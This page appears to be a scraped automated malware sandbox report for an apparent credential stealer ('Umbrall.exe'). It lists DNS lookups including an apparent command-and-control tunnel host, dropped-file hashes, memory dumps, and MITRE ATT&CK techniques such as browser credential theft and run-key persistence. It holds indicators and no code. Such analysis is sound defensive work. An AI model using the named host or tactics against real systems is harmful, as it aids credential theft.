56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

Umbrall.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.128.233

162.159.137.232

162.159.138.232

162.159.135.232
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

expected-schema.gl.at.ply.gg

dns

RuntimeBroker.exe

74 B
90 B
1
1

DNS Request

expected-schema.gl.at.ply.gg

DNS Response

147.185.221.20
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
36d03a272b43b1c16e5bce541906f649

SHA1
66f0178c3182a09386738d60501411a14b4a3864

SHA256
3fe1814466c786b9b14e3d1b9f9348434db490bc462b9e071f7bcaea5ef9e270

SHA512
d6c34935c1c22bda2ffd3550e54ca77bca92ab46829d3acc58c263fec94f8b6fa578105a80121c78e6d38ee51ec8f1bb8ae74ba7844a207499145308ec982a3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
852f019aa3823e1c90335ba698f31412

SHA1
a94ebb8e47316a5fec092ab897ec34299a82d200

SHA256
b4bed2ce3d5b6577836eb2b0a766c008243a1db942e341717fb4bc18e84fc2f0

SHA512
ca94865644cb570f60cf35a08ad5de6a3af4503bc40845237219c31e910f89cc93b280d997514583d86e6cf45eb2b8749bfe2e41bbaef67471e0b64b579e5ab3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7daa0b6c9f8fb37635f8121b0c06690a

SHA1
5684d950c7e582b02ba88e579f0d350100d16889

SHA256
a37ab7ac828226c2de1d05cdf35a6d7934ff3e5ecd617d46df1cdc784783d86b

SHA512
55578b4054f8e12df4721df0f8f35ca1f879dd2e2e32ac8aaa8bebf68f5521dfb35547a0f15e670cecd8019f18b32c0e6d78f44556431807e4225b04c0e99c35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4skeuya.vtn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

Filesize
80KB

MD5
5b8832e9845170717385ed9fb6dd6589

SHA1
b51bbc5d54e0e7c84a3488ca16643e8c88e452fa

SHA256
21ed3d77c21d3f856d7a0852f316abb104c90004e912fa330562435921a26d1d

SHA512
841f88b766c9aae7d6ac3f8c6e563da16a1266bb795c38060d465451c15b0052b13e58e26ad95325253d9196d30717418cbe3c75ad19eaad21a9bdf9f5289fa6

Download Submit
C:\Users\Admin\AppData\Roaming\SynsWave.exe

Filesize
25KB

MD5
12e7359129744823438f3d6b97192955

SHA1
89872a5a18abefe25d10efa824281718cf85ae39

SHA256
348086f9bd5939a48efcc94702271c1caf92ea11f3b0385367daf9530b51cf3e

SHA512
b38516752817d3ac6541d300cc17176c5bf1c38d321fd19c006cb1f5cf9d5ab7a228184ed267636841225e718f71d9cd8aed5e53e36c7ee3548ed6958b9e8563

Download Submit
C:\Users\Admin\AppData\Roaming\Umbrall.exe

Filesize
230KB

MD5
0b1ca5b7db9b402d2a2d5f2ceffb6d03

SHA1
e29fc0c937e930ae463110e6954759bdad901063

SHA256
7e7441520b44960fdc5fc8ec1b43c27a460baf7d84874d91fc78f4f97fd85aab

SHA512
5106921b55ec7f907b79a5b5fcab8cd387f27005c1da9a64680e0c2bdb25b99a20bbe59132452176ad9dcee9d8c2d23a8326f786de6453ef47094723f3e9a8b3

Download Submit
memory/1748-37-0x000002BBB3C30000-0x000002BBB3C52000-memory.dmp

Filesize
136KB

Download
memory/2888-34-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/2888-168-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/2888-29-0x0000000000540000-0x000000000055A000-memory.dmp

Filesize
104KB

Download
memory/3300-30-0x0000020D35780000-0x0000020D357C0000-memory.dmp

Filesize
256KB

Download
memory/3300-101-0x0000020D37430000-0x0000020D3743A000-memory.dmp

Filesize
40KB

Download
memory/3300-102-0x0000020D375D0000-0x0000020D375E2000-memory.dmp

Filesize
72KB

Download
memory/3300-65-0x0000020D373F0000-0x0000020D3740E000-memory.dmp

Filesize
120KB

Download
memory/3300-64-0x0000020D37440000-0x0000020D37490000-memory.dmp

Filesize
320KB

Download
memory/3300-63-0x0000020D4FCF0000-0x0000020D4FD66000-memory.dmp

Filesize
472KB

Download
memory/3300-36-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/3300-164-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/3644-0-0x00007FFFCDA13000-0x00007FFFCDA15000-memory.dmp

Filesize
8KB

Download
memory/3644-1-0x0000000000360000-0x00000000003BC000-memory.dmp

Filesize
368KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.